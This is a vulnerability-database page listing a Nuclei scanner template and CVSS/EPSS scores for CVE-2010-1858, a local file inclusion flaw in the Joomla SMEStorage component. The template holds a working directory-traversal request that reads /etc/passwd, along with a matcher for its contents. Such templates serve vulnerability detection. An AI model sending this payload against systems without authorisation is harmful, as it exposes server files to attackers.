Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1858
HistorySep 18, 2021 - 11:43 p.m.

Joomla! Component SMEStorage - Local File Inclusion

2021-09-1823:43:28
ProjectDiscovery
github.com
8
cve2010
joomla
lfi
local file inclusion
gelembjuk
exploit-db
packetstorm

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.7

Confidence

High

EPSS

0.011

Percentile

84.9%

A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.

id: CVE-2010-1858

info:
  name: Joomla! Component SMEStorage - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/11853
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1858
    - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57108
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1858
    cwe-id: CWE-22
    epss-score: 0.01155
    epss-percentile: 0.84543
    cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gelembjuk
    product: com_smestorage
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,gelembjuk

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210094404f0f2f56a48166becec496073702fc13c233b56b332a59b23f75f2e9e664022100a030d88a7de00e472b914f484390aaf26834775c6ffcaf7329883a6386f70366:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.7

Confidence

High

EPSS

0.011

Percentile

84.9%

Related for NUCLEI:CVE-2010-1858